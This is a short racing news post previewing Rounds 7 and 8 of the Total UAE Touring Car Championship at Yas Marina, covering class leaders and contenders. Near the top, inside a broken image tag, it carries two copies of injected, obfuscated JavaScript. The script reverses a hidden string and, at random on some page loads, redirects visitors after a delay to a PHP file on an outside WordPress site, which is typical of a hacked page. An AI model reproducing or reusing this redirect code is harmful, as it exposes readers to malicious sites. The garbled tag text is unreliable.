UAE National Racing. Touring Cars At Yas

$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=[“‘php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}” rel=”attachment wp-att-16135″>$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=[“‘php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}” alt=”” width=”720″ height=”480″ />

Round 7 and Round 8 at Yas Marina Circuit this weekend is set to be another hardcore battle in the tightly contested Total UAE Touring Car Championship, with valuable points up for grabs as the series heads towards the halfway mark after over a  month of inactivity.

Class 1 this year has been a battlefield between a quartet of SEATs in the capable hands of privateer Nader Zuhour, Mohammed Al Owais (Emirates Racing Team), Ramzi Moutran (Duel Racing) and Costas Papantonis (Gulf Petrochem Mouhrista Racing) – in the first six rounds at Dubai Autoddrome there has been little to separate the four, at Yas Marina Circuit much of the same can be expected.

Also very much in the mix is Martin Johnson in the Phoenix Motorsport Vauxhall Astra, who lies second in the points standings behind Zuhour who tops the table heading to Abu Dhabi.

Three of the top five Class 1 drivers have scored victories in the first six races, emphasizing how close the racing in the tin top series continues to be.

In Class 2 the battles are equally fierce with a gaggle of Honda’s scrapping for top honours. Aslam Moola (Emirates Racing Team Honda) heads to Abu Dhabi leading the points from reigning champion Umair Khan (Lap 57 Honda), the pair notching up three wins each so far this season. Also in the hunt will be Jonathan Mullan (GNSS Racing Honda) and Rupesh Chanaka (Lap 57 Honda).

A ‘race-within-a-race’ is the Clio Cup which should see Khalid Bin Hadher (Emirates Racing Team Renault) defending his points lead from Alexandros Annivas (Gulf Petrochem Mouhrista Racing Renault) and Sami Moutran (Duel Racing Renault) – Bin Hadher has four class wins to his credit, while Annivas has bagged two victories so far and racing has invariably been bumper-to-bumper.

There will be two sprint races for the Total UAE Touring Cars at Yas Marina Circuit on the day.

Also part of the race weekend programme at Yas Marina Circuit are races for UAE Radical Cup, Formula Gulf 1000 and Porsche GT3 Cup Challenge Middle East.

Categories: Race


No Comments